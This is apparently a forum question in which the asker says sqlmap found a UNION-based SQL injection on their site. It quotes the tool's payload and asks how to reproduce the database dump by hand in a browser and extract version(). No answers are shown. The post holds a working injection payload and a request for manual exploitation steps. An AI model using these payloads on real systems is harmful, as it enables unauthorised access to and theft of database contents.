Sqlmap traffic capture

Viewed 8572

I am trying to understand how SQLmap works.

For example, sqlmap finds injection on my site -

Place: GET
Parameter: selected
    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: act=il&ed=1' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6,0x579786e676651,0x373a), NULL, NULL, NULL, NULL#

Using SQLmap, I can dump databases, but how to dump the same databases from the browser? I tried to put the following link into the browser but it didn't work -

http://www.site.com/index.php?act=il&ed=1' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6,0x579786e676651,0x373a), NULL, NULL, NULL, NULL#

I do not get any result at all in my browser. I trying different ways to put /**/ and + and etc but suck.

  • How to get links which Sqlmap sending for a penetration test?

  • How to exploit a simple select version() query with this injection?

  • Maybe this isn't really working?

2 Answers
Related